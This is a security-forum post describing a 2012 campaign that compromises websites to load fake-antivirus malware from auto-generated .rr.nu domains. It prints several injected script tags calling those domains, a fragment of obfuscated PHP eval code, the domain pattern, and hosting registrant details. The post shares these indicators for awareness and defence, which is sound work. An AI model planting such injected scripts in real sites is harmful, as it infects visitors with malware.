Malware Campaign from .rr.nu

Prorootect

Prorootect

Level 69
Thread author
Verified
Nov 5, 2011
5,855
5,738
6,768
0wN3D by my cat!
malwaretips.com
.
Malware Campaign from .rr.nu topic only here ..

Malware Campaign from .rr.nu : on blog.sucuri.net : http://blog.sucuri.net/2012/02/malware-campaign-from-rr-nu.html

'We are seeing quite a few websites being compromised with malware getting loaded from random domains in the .rr.nu TLD.'

I too ..

Dyslexic Mayans Want to Sell You Cialis
Problems with preg_replace("/.*/e","\x65\x76 , $_8b7b="\x63\x72\, eval(base64_ hacks, and those damn rr.nu domain redirects : on domesticenthusiast.blogspot.fr : http://domesticenthusiast.blogspot.fr/
.
 
So look at this example:

<!-- Share This END -->
<script src="http://garin90diana.rr.nu/pmg.php?d=x"></script>
</body>
</html>

:D

.. or after refresh of this hacked page:


<!-- Share This END -->
<script src="http://pfo42rest.rr.nu/pmg.php?d=x"></script>
</body>
</html>

:D:D

.. or:

<script src="http://cua09tedp.rr.nu/pmg.php?d=x"></script>

.. or:

<script src="http://nings61diagno.rr.nu/pmg.php?d=x"></script>

.. or:

<script src="http://red38fir.rr.nu/pmg.php?d=x"></script>

etc etc., then you have the payload: Antivirus 2012 or other FakeAV from Russia with Love:D
 
On-Going Dynamic FakeAV Campaign (yes, from Russia with Love!..) : on Zscaler blog: http://research.zscaler.com/2012/03/on-going-dynamic-fakeav-campaign.html

'The campaign is making use of auto-domain generation and auto-updating of infected sites to change the embedded link with every visit.' ..

'There were over 100 of our customers attempting to access a large number of websites on a handful of IPs with domains matching the pattern:
[3-6 random letters][2 digits][3-6 random letters].rr.nu
Given the very, very large number of domains used, this has to be some auto-domain generation/registration algorithm used in this campaign.

The pages accessed in the campaign includes:
/n.php?h=1&s=mm
/mm.php?d=x1
/nl.php?p=d

..

195.88.181.112 hosting information:

inetnum: 195.88.181.0 - 195.88.181.255
netname: INET4YOU
descr: PE Bogaturev Sergey Anatolievich
country: RU

person: Bogaturev Sergey
address: RU, Gornuy #####, Komsomolskiy str. '

Aaa, Mr.Sergey, Gournuy ##### .. RU, Gornuy #####, Komsomolskiy str - it's good to know! Visit immediately your post of Police, and tell all.:(
.
 
You must log in or register to reply here.

You may also like...